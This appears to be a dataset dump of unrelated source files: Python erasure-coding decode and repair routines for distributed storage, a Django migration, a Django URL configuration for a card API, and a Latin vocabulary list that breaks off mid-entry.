for m in range(nativeBlockNum*2):
gj_matrix[j][m] = gj_matrix[j][m] - gj_matrix[rowNo][m]*C
def decode(n, k, src, blocknums, parityCoeff, dest, filesize, setting):
'''Decode chunk files to dest file.'''
## special handling for 0B files
if filesize <= 0:
open(dest,'wb').close()
return
cv_temp=[]
nativeBlockNum = getNativeBlockNum(n, k)
parityBlockNum = getParityBlockNum(n, k)
enc_matrix = [[GF256int(0) for col in range(nativeBlockNum)] for row in range(parityBlockNum)]
dec_matrix = [[GF256int(0) for col in range(nativeBlockNum)] for row in range(nativeBlockNum)]
rev_matrix = [[GF256int(0) for col in range(nativeBlockNum)] for row in range(nativeBlockNum)]
gj_matrix = [[GF256int(0) for col in range(nativeBlockNum*2)] for row in range(nativeBlockNum)]
## generate the encoding matrix
counter = 0
for i in range(parityBlockNum):
for j in range(nativeBlockNum):
enc_matrix[i][j] = GF256int(parityCoeff[counter])
counter += 1
cm1 = CoeffMatrix(nativeBlockNum)
for i in range(parityBlockNum):
cv_temp.append(CoeffVector(nativeBlockNum))
for j in range(nativeBlockNum):
cv_temp[i].coeff_[j] = enc_matrix[i][j]
cv_temp[i].first()
cm1.addcoeffvector(cv_temp[i])
## generate the decoding matrix
i=0
for selectChunkNo in blocknums:
for j in range(nativeBlockNum):
dec_matrix[i][j]=enc_matrix[selectChunkNo][j]
i += 1
## initialize the reverse matrix
for i in range(nativeBlockNum):
for j in range(nativeBlockNum):
if j==i:
rev_matrix[i][j]= GF256int(1)
## initialize the Gauss-Jordan matrix = [decoding,reverse]
for i in range(nativeBlockNum):
for j in range(nativeBlockNum*2):
if j<nativeBlockNum:
gj_matrix[i][j]= dec_matrix[i][j]
else:
gj_matrix[i][j]= rev_matrix[i][j-nativeBlockNum]
reversematrix(n, k, gj_matrix)
for i in range(nativeBlockNum):
for j in range(nativeBlockNum):
dec_matrix[i][j] = gj_matrix[i][j+nativeBlockNum]
##generate decode data chunks
selectchunk=[]
for filename in src:
infile = open(filename,'rb')
selectchunk.append(infile.read())
infile.close()
chunksize = os.path.getsize(src[0])
indatalist = ''.join(selectchunk)
##rebuild the original chunks
parityCoeff_temp = ''.join([chr(dec_matrix[i][j]) \
for i in range(nativeBlockNum) \
for j in range(nativeBlockNum)])
outdatalist = codings.clibfmsr.clibfmsr.decodeComputation(indatalist, \
parityCoeff_temp, nativeBlockNum, chunksize)
outfile = open(dest,'wb')
writelen = 1048576
writenext = 0
for i in range(0,filesize-writelen,writelen):
writenext = i+writelen
outfile.write(outdatalist[i:writenext])
outfile.write(outdatalist[writenext:filesize])
outfile.close()
def getCheckNum(parityBlockNum):
'''Get check number for checking strong MDS, for fmsr(k=n-2) only.'''
return int((parityBlockNum-2)*(parityBlockNum-2-1)/2 - ((parityBlockNum/2)-1))
def getStrongMDSPropertyDegree(repairNodeno, nativeBlockNum, parityBlockNum, checkNum, enc_matrix):
'''Get strong MDS property degree.'''
currentStrongMDSPropertyDegree = 0
survivalcoeffvectorset = []
flag = 0
for i in range(parityBlockNum):
#get coeff vectors of survival parity blocks
if int(i/2)!= repairNodeno:
survivalcoeffvectorset.append(CoeffVector(nativeBlockNum))
for j in range(nativeBlockNum):
survivalcoeffvectorset[i - flag*2].coeff_[j] = enc_matrix[i][j]
survivalcoeffvectorset[i - flag*2].first()
else:
flag =1
s = 0
for i in range(parityBlockNum-2):
for j in range(parityBlockNum-2):
if i<j:
checkmatrix = CoeffMatrix(nativeBlockNum)
for k in range (parityBlockNum-2):
if k!=i and k!=j:
checkmatrix.addcoeffvector(survivalcoeffvectorset[k].copy())
if checkmatrix.rank_ == nativeBlockNum:
currentStrongMDSPropertyDegree += 1
s += 1
return currentStrongMDSPropertyDegree
def checkMDS(MSR_n, MSR_k, enc_matrix):
'''Check MDS property, for fmsr(k=n-2) only.'''
'''Return a MDS property value.'''
nativeBlockNum = getNativeBlockNum(MSR_n, MSR_k)
parityBlockNum = getParityBlockNum(MSR_n, MSR_k)
MDSpropery = True
allcoeffvectors = []
for i in range(parityBlockNum):
allcoeffvectors.append(CoeffVector(nativeBlockNum))
for j in range(nativeBlockNum):
allcoeffvectors[i].coeff_[j] = enc_matrix[i][j]
allcoeffvectors[i].first()
permutation = int(MSR_n * (MSR_n - 1) / 2)
#permutation of selecting n-2 nodes from n nodes
checkmatrix = [CoeffMatrix(nativeBlockNum) for col in range(permutation)]
s = 0
for i in range (MSR_n):
for j in range(MSR_n):
if i<j:
for b in range(MSR_n):
if b !=i and b!=j:
checkmatrix[s].addcoeffvector(allcoeffvectors[b*2].copy())
checkmatrix[s].addcoeffvector(allcoeffvectors[b*2+1].copy())
if checkmatrix[s].rank_ != nativeBlockNum:
MDSpropery = False
s += 1
return MDSpropery
def checkstongMDS(n, k, nativeBlockNum, parityBlockNum, enc_matrix):
'''Check strong MDS property, for fmsr(k=n-2) only.'''
'''Return list of MDS property degrees.'''
strongMDSPropertyDegrees = []
#get check-combination number
checkNum = getCheckNum(parityBlockNum)
#Calculate total strong MDS property degree
for i in range(n):
strongMDSPropertyDegrees.append(getStrongMDSPropertyDegree(i, \
nativeBlockNum, parityBlockNum, checkNum, enc_matrix))
return strongMDSPropertyDegrees
def testStrongMDSProperty(strongMDSPropertyDegrees, checkNum,n):
'''Decide whether the current parity coefficient set passes the strong MDS property.'''
result = True
#threshold = checkNum
threshold = 2*(n-1)*(n-2)-(n-2)*(n-3)/2
#Important: currently the threshold value is hardcode
for degree in strongMDSPropertyDegrees:
if degree < threshold:
result = False
return result
def functionalRepair(n, k, src, blocknums, failedNode, parityCoeff, repairChunks, setting, metadata):
'''Functional repair by generating new parity chunks.'''
nativeBlockNum = getNativeBlockNum(n, k)
parityBlockNum = getParityBlockNum(n, k)
checkNum = getCheckNum(parityBlockNum)
## read the encoding matrix and repair
enc_matrix = metadata.enc_matrix
repairCodingCoeff = metadata.repairCodingCoeff
indatalist = []
for filepath in src:
infile = open(filepath, 'rb')
indatalist.append(infile.read())
infile.close()
chunksize = os.path.getsize(src[0])
if chunksize > 0:
#Repair computation:
indatalist_temp = ''.join(indatalist)
parityCoeff_temp = []
for i in range(n-k):
for j in range(n-1):
parityCoeff_temp.append(chr(repairCodingCoeff[i][j]))
parityCoeff_temp = ''.join(parityCoeff_temp)
outdatalist = codings.clibfmsr.clibfmsr.repairComputation(indatalist_temp, \
parityCoeff_temp, n, k, chunksize)
counter = 0
for i in range(parityBlockNum):
for j in range(nativeBlockNum):
parityCoeff[counter] = enc_matrix[i][j]
counter += 1
#Add support for big-chunk:
writelen = 1048576
writenext = 0
for i in range(metadata.totalnode):
if setting.nodeInfo[i].healthy == False:
dest = setting.chunkdir + '/' + metadata.filename + '.node' + str(i)
filesize = metadata.fileNodeInfo[i].bigchunksize
if chunksize <= 0:
open(dest,'wb').close()
else:
outfile = open(dest, 'wb')
for j in range(0,filesize-writelen,writelen):
writenext = j+writelen
outfile.write(outdatalist[j:writenext])
outfile.write(outdatalist[writenext:filesize])
outfile.close()
metadata.fileNodeInfo[i].bigchunkpath = dest
metadata.fileNodeInfo[i].bigchunkname = metadata.filename + '.node' + str(i)
metadata.fileNodeInfo[i].action = 'upload'
|
9,528 | 65ea27851d9db0f0a06d42bd37eff633d22a1548 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-30 14:50
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('books', '0007_auto_20170127_2254'),
]
operations = [
migrations.AlterField(
model_name='book',
name='subtitle',
field=models.CharField(blank=True, help_text='e.g. There and Back Again', max_length=200),
),
migrations.AlterField(
model_name='book',
name='title',
field=models.CharField(db_index=True, help_text='e.g. The Hobbit', max_length=200, unique=True),
),
]
|
9,529 | aac334256c1e05ef33a54da19925911af6645a10 | from django.urls import path
from .authentication import GetToken, RegisterUserAPIView
from .resurses import *
urlpatterns = [
path('register/', RegisterUserAPIView.as_view()),
path('get/token/', GetToken.as_view()),
path('card/list/', ShowCardsAPIView.as_view()),
path('card/create/', CreateCardAPIView.as_view()),
path('card/<int:pk>/status/raise/', RaiseStatusAPIView.as_view()),
path('card/<int:pk>/status/omit/', OmitStatusAPIView.as_view()),
path('card/<int:pk>/delete/', DeleteCardAPIView.as_view()),
path('card/<int:pk>/update/', UpdateCardAPIView.as_view()),
path('card/get/', GetCardSListAPIView.as_view()),
]
|
9,530 | 8a0c0f5ca6a965e07f59a6c88d4dd335310cbdfc | import text
nan=""
section_words = {'start': -1, '1.1': 17, '1.2': 38, '1.3': 55, '1.4': 76, '1.5': 95, '1.6': 114, '1.7': 133, '1.8': 151, '1.9': 170, '1.10': 190, '1.11': 209, '1.12': 233, '1.13': 257, '1.14': 277, '1.15': 299, '1.16': 320, '1.17': 341, '1.18': 364, '1.19': 385, '1.20': 405, '1.21': 428, '2.1': 451, '2.2': 474, '2.3': 495, '2.4': 521, '2.5': 542, '2.6': 564, '2.7': 587, '2.8': 611, '2.9': 633, '2.10': 653, '2.11': 674, '2.12': 695, '2.13': 718, '2.14': 740, '2.15': 760, 'end': -2}
the_text = [('AGRICOLA', 0, 'agricola', 'farmer', '', '1_1', 1), ('AMBVLO', 1, 'ambulo', 'to walk', '', '1_1', 2), ('AMO', 2, 'amo', 'to love', '', '1_1', 2), ('AQVA', 3, 'aqua', 'water', '', '1_1', 1), ('ATHLETA', 4, 'athleta', 'athlete', '', '1_1', 1), ('BENE', 5, 'bene', 'well', '', '1_1', 1), ('CVRO', 6, 'curo', 'to take care for/of', '', '1_1', 2), ('ET/2', 7, 'et', 'and', '', '1_1', 1), ('FILIA', 8, 'filia', 'daughter', '', '1_1', 1), ('ITAQVE', 9, 'itaque', 'and so', '', '1_1', 1), ('LVPA', 10, 'lupa', 'she–wolf', '', '1_1', 1), ('NAVTA', 11, 'nauta', 'sailor', '', '1_1', 1), ('POETA', 12, 'poeta', 'poet', '', '1_1', 1), ('POSTEA', 13, 'postea', 'afterwards', '', '1_1', 1), ('PVELLA', 14, 'puella', 'girl', '', '1_1', 1), ('ROMA/N', 15, 'Roma', 'Rome', '', '1_1', 1), ('SVM/1', 16, 'sum', 'to be', '', '1_1', 3), ('TERRA', 17, 'terra', 'land', '', '1_1', 1), ('AMBVLO', 18, 'ambulo', 'to walk', '', '1_2', 2), ('AMO', 19, 'amo', 'to love', '', '1_2', 2), ('CVRO', 20, 'curo', 'to take care for/of', '', '1_2', 2), ('SVM/1', 21, 'sum', 'to be', '', '1_2', 3), ('DEBEO', 22, 'debeo', 'ought, must, should; to owe', '', '1_2', 1), ('DIV', 23, 'diu', 'for a long time', '', '1_2', 1), ('EGO', 24, 'ego', 'I', '', '1_2', 3), ('EXSPECTO', 25, 'exspecto', 'to wait for, await, expect', '', '1_2', 1), ('FABVLA/1', 26, 'fabula', 'story', '', '1_2', 1), ('FORMA', 27, 'forma', 'form,appearance', '', '1_2', 1), ('HABEO', 28, 'habeo', 'to have', '', '1_2', 1), ('HABITO', 29, 'habito', 'to live, dwell', '', '1_2', 1), ('NARRO', 30, 'narro', 'to tell', '', '1_2', 1), ('NON', 31, 'non', 'not', '', '1_2', 1), ('NVNC', 32, 'nunc', 'now', '', '1_2', 1), ('PARO/2', 33, 'paro', 'to prepare, get ready, design', '', '1_2', 2), ('PATRIA', 34, 'patria', 'fatherland', '', '1_2', 1), ('TENEO', 35, 'teneo', 'to hold', '', '1_2', 1), ('TV', 36, 'tu', 'you', '', '1_2', 3), ('VIDEO', 37, 'video', 'to see', '', '1_2', 1), ('VOCO', 38, 'voco', 'to call', '', '1_2', 1), ('EGO', 39, 'ego', 'I', '', '1_3', 3), ('TV', 40, 'tu', 'you', '', '1_3', 3), ('AGER', 41, 'ager', 'field', '', '1_3', 1), ('AMICVS/1', 42, 'amicus', 'friend', '', '1_3', 1), ('ANIMVS', 43, 'animus', 'spirit, soul, mind', '', '1_3', 1), ('CASA', 44, 'casa', 'little house, cottage', '', '1_3', 1), ('CVM/2', 45, 'cum', 'with (w/ abl.)', '', '1_3', 1), ('DEINDE', 46, 'deinde', 'then', '', '1_3', 1), ('DOMVS', 47, 'domus', 'home', '', '1_3', 2), ('FILIVS', 48, 'filius', 'son', '', '1_3', 1), ('IN', 49, 'in', 'in, on (w/ abl.); into, to, against (w/ acc.)', '', '1_3', 2), ('PVER', 50, 'puer', 'boy', '', '1_3', 1), ('RIVVS', 51, 'rivus', 'brook, stream', '', '1_3', 1), ('TIMEO', 52, 'timeo', 'to fear, to be afraid', '', '1_3', 1), ('VALDE', 53, 'valde', 'very, exceedingly', '', '1_3', 1), ('VIA', 54, 'via', 'road', '', '1_3', 1), ('VIR', 55, 'vir', 'man', '', '1_3', 1), ('IN', 56, 'in', 'in, on (w/ abl.); into, to, against (w/ acc.)', '', '1_4', 2), ('AD/2', 57, 'ad', 'into, towards, to (w/ acc.)', '', '1_4', 1), ('ARMATVS/2', 58, 'armatus', 'armed', '', '1_4', 1), ('AVTEM', 59, 'autem', 'however', '', '1_4', 1), ('BELLVM', 60, 'bellum', 'war', '', '1_4', 1), ('BONVS', 61, 'bonus', 'good', '', '1_4', 1), ('CASTRA/2', 62, 'castra', 'camp', '', '1_4', 1), ('DO', 63, 'do', 'to give', '', '1_4', 1), ('DOLVS', 64, 'dolus', 'trickery, deception', '', '1_4', 1), ('EX', 65, 'e', 'from, out of (w/ abl.)', '', '1_4', 1), ('INTRO/2', 66, 'intro', 'to enter', '', '1_4', 1), ('IVBEO', 67, 'iubeo', 'to order somebody (acc.) to do something (inf.)', '', '1_4', 1), ('IVSTVS', 68, 'iustus', 'legitimate, open, just', '', '1_4', 1), ('MAGNVS', 69, 'magnus', 'large, great, important', '', '1_4', 1), ('MALVS/3', 70, 'malus', 'bad', '', '1_4', 1), ('PRAECLARVS', 71, 'praeclarus', 'famous, distinguished', '', '1_4', 1), ('PRAEMIVM', 72, 'praemium', 'reward', '', '1_4', 1), ('ROMANVS/A', 73, 'Romanus', 'Roman; the Romans (pl.)', '', '1_4', 1), ('SED', 74, 'sed', 'but', '', '1_4', 1), ('VENENVM', 75, 'venenum', 'poison', '', '1_4', 1), ('VINCVLVM', 76, 'vinculum', 'chain, fetter', '', '1_4', 1), ('PARO/2', 77, 'paro', 'to prepare, get ready, design', '', '1_5', 2), ('AB', 78, 'a', 'by, from (w/ abl.)', '', '1_5', 1), ('AVXILIVM', 79, 'auxilium', 'help', '', '1_5', 1), ('COGITO', 80, 'cogito', 'to think', '', '1_5', 1), ('CONSILIVM', 81, 'consilium', 'plan, advice', '', '1_5', 2), ('DE', 82, 'de', 'about, concerning, down from (w/ abl.)', '', '1_5', 1), ('DOLEO', 83, 'doleo', 'to feel pain, to be hurt', '', '1_5', 1), ('EPISTOLA', 84, 'epistula', 'letter', '', '1_5', 1), ('FAMILIA', 85, 'familia', 'family, household', '', '1_5', 1), ('GAVDIVM', 86, 'gaudium', 'joy', '', '1_5', 1), ('LACRIMA', 87, 'lacrima', 'tear', '', '1_5', 1), ('LONGE', 88, 'longe', 'far', '', '1_5', 1), ('LONGVS', 89, 'longus', 'long', '', '1_5', 1), ('MISER', 90, 'miser', 'wretched, sad, miserable', '', '1_5', 1), ('NAM', 91, 'nam', 'for, in fact', '', '1_5', 1), ('NONSOLVM', 92, 'non', 'not only…, but also…', '', '1_5', 1), ('PVLCHER', 93, 'pulcher', 'beautiful, nice', '', '1_5', 1), ('SEMPER', 94, 'semper', 'always', '', '1_5', 1), ('TAMEN', 95, 'tamen', 'however', '', '1_5', 2), ('SVM/1', 96, 'sum', 'to be', '', '1_6', 3), ('DOCEO', 97, 'doceo', 'to teach', '', '1_6', 1), ('DVM/2', 98, 'dum', 'while', '', '1_6', 1), ('EXEMPLVM', 99, 'exemplum', 'example', '', '1_6', 1), ('FIRMO', 100, 'firmo', 'to strengthen', '', '1_6', 1), ('IACEO', 101, 'iaceo', 'to lie down, to be inert', '', '1_6', 1), ('IVDICO', 102, 'iudico', 'to judge', '', '1_6', 1), ('LIBER/1', 103, 'liber', 'book', '', '1_6', 1), ('LITTERA', 104, 'littera', 'letter of the alphabet (sing.); literature, letter (pl.)', '', '1_6', 1), ('MANEO', 105, 'maneo', 'to remain', '', '1_6', 1), ('MEMORIA', 106, 'memoria', 'memory', '', '1_6', 1), ('MVLTVS', 107, 'multus', 'much, many', '', '1_6', 1), ('POSSVM/1', 108, 'possum', 'to be able, can', '', '1_6', 1), ('PROPTER/2', 109, 'propter', 'because of, on account of (w/ acc.)', '', '1_6', 1), ('SAEPE', 110, 'saepe', 'often', '', '1_6', 1), ('SERVO', 111, 'servo', 'to save, preserve', '', '1_6', 1), ('SOLEO', 112, 'soleo', 'to be accustomed (w/ inf.)', '', '1_6', 1), ('TENEBRAE', 113, 'tenebrae', 'shadows, darkness (pl.)', '', '1_6', 1), ('VITA', 114, 'vita', 'life', '', '1_6', 1), ('AESTIMO', 115, 'aestimo', 'to regard, esteem', '', '1_7', 1), ('AESTIMOVNIVSASSIS', 116, 'aestimo', 'I do not care a bit ', '', '1_7', 1), ('AMOR', 117, 'amor', 'love', '', '1_7', 1), ('DELICIA/1', 118, 'delicia', 'delight, pet', '', '1_7', 1), ('DIGITVS', 119, 'digitus', 'finger', '', '1_7', 1), ('DOMINA', 120, 'domina', 'mistress', '', '1_7', 1), ('GREMIVM', 121, 'gremium', 'lap', '', '1_7', 1), ('INVIDEO', 122, 'invideo', 'to envy', '', '1_7', 1), ('MEVS', 123, 'meus', 'my', '', '1_7', 1), ('OCVLVS', 124, 'oculus', 'eye', '', '1_7', 1), ('PASSER', 125, 'passer', 'sparrow', '', '1_7', 1), ('PAX', 126, 'pax', 'peace; favor', '', '1_7', 1), ('PVTO', 127, 'puto', 'to think', '', '1_7', 1), ('SENEX/1', 128, 'senex', 'old man', '', '1_7', 1), ('SESESE', 129, 'se', 'him/her/itself', '', '1_7', 1), ('SEVERVS', 130, 'severus', 'serious', '', '1_7', 1), ('SOROR', 131, 'soror', 'sister', '', '1_7', 1), ('SVI/1', 132, 'sui', 'him–/her–/itself', '', '1_7', 1), ('VERBVM', 133, 'verbum', 'word', '', '1_7', 1), ('CONTRA/2', 134, 'contra', 'against (w/ acc.)', '', '1_8', 1), ('DECERNO', 135, 'decerno', 'to decide, determine (often w/ inf.)', '', '1_8', 1), ('DICO/2', 136, 'dico', 'to say', '', '1_8', 1), ('DVX', 137, 'dux', 'leader, general', '', '1_8', 1), ('FORTITVDO', 138, 'fortitudo', 'courage', '', '1_8', 1), ('HOMO', 139, 'homo', 'man, human being; people (pl.)', '', '1_8', 1), ('INTELLIGO', 140, 'intellego', 'to understand', '', '1_8', 1), ('LIBERO', 141, 'libero', 'to free someone (acc.) from something (abl.)', '', '1_8', 1), ('MILES', 142, 'miles', 'soldier', '', '1_8', 1), ('NAVIGO', 143, 'navigo', 'to sail, navigate', '', '1_8', 1), ('ORACVLVM', 144, 'oraculum', 'oracle, prophecy', '', '1_8', 1), ('PETO', 145, 'peto', 'to seek', '', '1_8', 1), ('REX', 146, 'rex', 'king', '', '1_8', 1), ('TANDEM', 147, 'tandem', 'finally', '', '1_8', 1), ('TEMPLVM', 148, 'templum', 'temple', '', '1_8', 1), ('TIMOR', 149, 'timor', 'fear', '', '1_8', 1), ('TVM', 150, 'tum', 'then, at that time', '', '1_8', 2), ('VINCO', 151, 'vinco', 'to conquer', '', '1_8', 1), ('ANIMAL', 152, 'animal', 'animal', '', '1_9', 1), ('ARMA', 153, 'arma', 'weapons (pl.)', '', '1_9', 1), ('AVDIO', 154, 'audio', 'to hear, listen', '', '1_9', 1), ('CAPVT', 155, 'caput', 'head', '', '1_9', 1), ('CIVIS', 156, 'civis', 'citizen', '', '1_9', 1), ('CONSVL', 157, 'consul', 'consul', '', '1_9', 1), ('CORPVS', 158, 'corpus', 'body', '', '1_9', 1), ('CREDO', 159, 'credo', 'to believe somebody (w/ dat.)', '', '1_9', 1), ('EXEMPLAR', 160, 'exemplar', 'example', '', '1_9', 1), ('GERO', 161, 'gero', 'to carry; to behave (w/ se)', '', '1_9', 2), ('MARE', 162, 'mare', 'sea', '', '1_9', 1), ('MORS', 163, 'mors', 'death', '', '1_9', 1), ('MVLIER', 164, 'mulier', 'woman', '', '1_9', 1), ('ORATIO', 165, 'oratio', 'oration, speech', '', '1_9', 1), ('SCIO', 166, 'scio', 'to know', '', '1_9', 1), ('SENTIO', 167, 'sentio', 'to perceive', '', '1_9', 1), ('TEMPVS/1', 168, 'tempus', 'time', '', '1_9', 1), ('VENIO', 169, 'venio', 'to come', '', '1_9', 1), ('VRBS', 170, 'urbs', 'city', '', '1_9', 1), ('ACER/2', 171, 'acer', 'keen, fierce', '', '1_10', 1), ('AEDIFICO', 172, 'aedifico', 'to build', '', '1_10', 1), ('CAPIO/2', 173, 'capio', 'to take, adopt, capture', '', '1_10', 1), ('CELEBER', 174, 'celeber', 'renowned, well–known, crowded', '', '1_10', 1), ('CVPIO', 175, 'cupio', 'to desire, want', '', '1_10', 1), ('DELEO', 176, 'deleo', 'to destroy', '', '1_10', 1), ('DEVS', 177, 'deus', 'god', '', '1_10', 1), ('DONVM', 178, 'donum', 'gift', '', '1_10', 1), ('EQVVS', 179, 'equus', 'horse', '', '1_10', 1), ('FELIX', 180, 'felix', 'fortunate, happy', '', '1_10', 1), ('FLAMMA', 181, 'flamma', 'flame', '', '1_10', 1), ('FORTIS', 182, 'fortis', 'brave, strong', '', '1_10', 1), ('FVGIO', 183, 'fugio', 'to flee, run away', '', '1_10', 1), ('HOSTIS', 184, 'hostis', 'enemy', '', '1_10', 1), ('MOVEO', 185, 'moveo', 'to move', '', '1_10', 1), ('NEC/2', 186, 'nec', 'nor; and not', '', '1_10', 2), ('NOX', 187, 'nox', 'night', '', '1_10', 1), ('PAVCI', 188, 'paucus', 'few', '', '1_10', 1), ('PERICVLVM', 189, 'periculum', 'danger', '', '1_10', 1), ('PVGNO', 190, 'pugno', 'to fight', '', '1_10', 1), ('AGO', 191, 'ago', 'to drive, lead, do, behave', '', '1_11', 1), ('ARDEO', 192, 'ardeo', 'to burn, be on fire', '', '1_11', 1), ('CONSPICIO', 193, 'conspicio', 'to look at, observe', '', '1_11', 1), ('CRVDELIS', 194, 'crudelis', 'cruel', '', '1_11', 1), ('DOLOR', 195, 'dolor', 'grief, pain', '', '1_11', 1), ('ITA', 196, 'ita', 'yes', '', '1_11', 2), ('MINIME', 197, 'minime', 'No', '', '1_11', 1), ('MITTO', 198, 'mitto', 'to send', '', '1_11', 1), ('NE/2', 199, 'ne', '(added to the first word of a question', '', '1_11', 1), ('NOVVS', 200, 'novus', 'new', '', '1_11', 1), ('PARVM/2', 201, 'parum', 'too little', '', '1_11', 2), ('QVE', 202, 'que', 'and', '', '1_11', 1), ('QVOQVE', 203, 'quoque', 'also', '', '1_11', 1), ('REGINA', 204, 'regina', 'queen', '', '1_11', 1), ('RELINQVO', 205, 'relinquo', 'to abandon', '', '1_11', 1), ('SILVA', 206, 'silva', 'forest', '', '1_11', 1), ('SPELVNCA', 207, 'spelunca', 'cave', '', '1_11', 1), ('TEMPESTAS', 208, 'tempestas', 'season', '', '1_11', 1), ('VNA', 209, 'una', 'together', '', '1_11', 1), ('BELLVMGERO', 210, 'bellum', 'to wage war', '', '1_12', 1), ('CONSVMO', 211, 'consumo', 'to consume', '', '1_12', 1), ('DEXTERA', 212, 'dextera', 'right hand', '', '1_12', 1), ('FACIO', 213, 'facio', 'to do, make', '', '1_12', 1), ('IBI', 214, 'ibi', 'there', '', '1_12', 1), ('IGNIS', 215, 'ignis', 'fire', '', '1_12', 1), ('INQVIO', 216, 'inquam', 'to say (used with direct speech)', '', '1_12', 3), ('IRA', 217, 'ira', 'anger', '', '1_12', 1), ('IS', 218, 'is', 's/he/it, this, that', '', '1_12', 1), ('NOMEN', 219, 'nomen', 'name', '', '1_12', 1), ('NOS', 220, 'nos', 'we; us', '', '1_12', 1), ('NOSTER', 221, 'noster', 'our, ours', '', '1_12', 1), ('OCCIDO/2', 222, 'occido', 'to strike down, knock down', '', '1_12', 1), ('OSTENDO', 223, 'ostendo', 'to show', '', '1_12', 1), ('PONO', 224, 'pono', 'to place', '', '1_12', 1), ('PROPE/2', 225, 'prope', 'near', '', '1_12', 2), ('PROVIRIBVS', 226, 'pro', 'with all one’s might', '', '1_12', 1), ('SIMILIS', 227, 'similis', 'similar', '', '1_12', 1), ('STATIM', 228, 'statim', 'immediately', '', '1_12', 1), ('TANTVS', 229, 'tantus', 'so much', '', '1_12', 1), ('TVVS', 230, 'tuus', 'your', '', '1_12', 1), ('VESTER', 231, 'vester', 'your', '', '1_12', 1), ('VIS', 232, 'vis', 'force', '', '1_12', 1), ('VOS', 233, 'vos', 'you', '', '1_12', 1), ('EGO', 234, 'ego', 'I', '', '1_13', 3), ('TV', 235, 'tu', 'you', '', '1_13', 3), ('TVM', 236, 'tum', 'then, at that time', '', '1_13', 2), ('ALIVS', 237, 'alius', 'another, other', '', '1_13', 1), ('APVD', 238, 'apud', 'at the house of (w/ acc.)', '', '1_13', 1), ('ATQVE/1', 239, 'atque', 'as', '', '1_13', 2), ('DISCEDO/1', 240, 'discedo', 'to leave, withdraw, go away', '', '1_13', 1), ('DIVES', 241, 'dives', 'rich', '', '1_13', 1), ('DOCTVS', 242, 'doctus', 'learned', '', '1_13', 1), ('DVCO', 243, 'duco', 'to lead, take', '', '1_13', 2), ('ENIM/2', 244, 'enim', 'for, in fact', '', '1_13', 1), ('IVDEX', 245, 'iudex', 'judge', '', '1_13', 1), ('LICET/1', 246, 'licet', 'it is allowed, permitted (for someone)(to do something)(w/ dat. and inf.) ', '', '1_13', 1), ('NIHIL', 247, 'nihil', 'nothing', '', '1_13', 1), ('NOLO', 248, 'nolo', 'not to want, to be unwilling', '', '1_13', 2), ('OMNIS', 249, 'omnis', 'each, every, all', '', '1_13', 1), ('PRO/1', 250, 'pro', 'for, on behalf of (w/ abl.)', '', '1_13', 1), ('QVID', 251, 'quid', 'what; why', '', '1_13', 1), ('RESPONDEO', 252, 'respondeo', 'to answer', '', '1_13', 1), ('ROGO', 253, 'rogo', 'to ask', '', '1_13', 1), ('SVVS', 254, 'suus', 'his, her, its, their', '', '1_13', 2), ('TANTVM/2', 255, 'tantum', 'only', '', '1_13', 1), ('VALE', 256, 'vale', 'to greetings! farewell!', '', '1_13', 1), ('VALEO', 257, 'valeo', 'to be able (w/ inf.); to be in good health', '', '1_13', 3), ('ALBVS', 258, 'albus', 'white', '', '1_14', 1), ('ARBOR', 259, 'arbor', 'tree', '', '1_14', 1), ('CADO', 260, 'cado', 'to fall', '', '1_14', 1), ('COMEDO/2', 261, 'comedo', 'to eat', '', '1_14', 1), ('CONVENIO', 262, 'convenio', 'to meet', '', '1_14', 1), ('FLVO', 263, 'fluo', 'to flow', '', '1_14', 1), ('GLADIVS', 264, 'gladius', 'sword', '', '1_14', 1), ('IAM', 265, 'iam', 'already, yet', '', '1_14', 1), ('MOX', 266, 'mox', 'soon', '', '1_14', 1), ('ODIVM', 267, 'odium', 'hatred', '', '1_14', 2), ('OS/1', 268, 'os', 'mouth', '', '1_14', 1), ('PARENS/1', 269, 'parens', 'parent', '', '1_14', 1), ('PECTVS', 270, 'pectus', 'chest', '', '1_14', 1), ('PER', 271, 'per', 'through (w/ acc.)', '', '1_14', 1), ('PRIMVS', 272, 'primus', 'first', '', '1_14', 1), ('QVI/1', 273, 'qui', 'who, which (rel. pronoun); what? which? (inter. adj.) ', '', '1_14', 2), ('RVBER', 274, 'ruber', 'red', '', '1_14', 1), ('SANGVIS', 275, 'sanguis', 'blood', '', '1_14', 1), ('SEPARO/2', 276, 'separo', 'to separate, divide', '', '1_14', 1), ('TANGO', 277, 'tango', 'to touch', '', '1_14', 1), ('INQVIO', 278, 'inquam', 'to say (used with direct speech)', '', '1_15', 3), ('QVI/1', 279, 'qui', 'who, which (rel. pronoun); what? which? (inter. adj.) ', '', '1_15', 2), ('ANTE/2', 280, 'ante', 'in front of (w/ acc.)', '', '1_15', 1), ('ARGVMENTVM', 281, 'argumentum', 'proof, indication, argument', '', '1_15', 1), ('CVR/1', 282, 'cur', 'why', '', '1_15', 1), ('DIFFICILIS', 283, 'difficilis', 'difficult', '', '1_15', 1), ('ECCE', 284, 'ecce', 'look here!', '', '1_15', 1), ('ETIAM', 285, 'etiam', 'even, also', '', '1_15', 1), ('FORSITAN', 286, 'forsan', 'perhaps', '', '1_15', 1), ('NEGLIGO', 287, 'neglego', 'to neglect', '', '1_15', 1), ('PARVVS/2', 288, 'parvus', 'small', '', '1_15', 1), ('QVIS/1', 289, 'quis', 'who? which? (inter. pronoun)', '', '1_15', 1), ('RVSTICVS/2', 290, 'rusticus', 'rural, rustic', '', '1_15', 1), ('SAXVM', 291, 'saxum', 'stone, rock', '', '1_15', 1), ('SENECTVS/1', 292, 'senectus', 'old age', '', '1_15', 1), ('SICVT/1', 293, 'sicut', 'just as', '', '1_15', 1), ('STO', 294, 'sto', 'stand', '', '1_15', 1), ('VBIQVE', 295, 'ubique', 'everywhere', '', '1_15', 1), ('VERVS', 296, 'verus', 'real, true', '', '1_15', 1), ('VETVSTVS', 297, 'vetustus', 'old', '', '1_15', 1), ('VILLA', 298, 'villa', 'estate', '', '1_15', 1), ('VMQVAM', 299, 'umquam', 'ever', '', '1_15', 1), ('AVVNCVLVS', 300, 'avunculus', 'uncle', '', '1_16', 1), ('CAELVM/1', 301, 'caelum', 'sky, heaven, weather', '', '1_16', 1), ('CAVSA', 302, 'causa', 'cause, reason', '', '1_16', 1), ('CINIS', 303, 'cinis', 'ash', '', '1_16', 1), ('CLADES', 304, 'clades', 'disaster', '', '1_16', 1), ('CLASSIS', 305, 'classis', 'fleet, class (of people)', '', '1_16', 1), ('FEMINA', 306, 'femina', 'woman', '', '1_16', 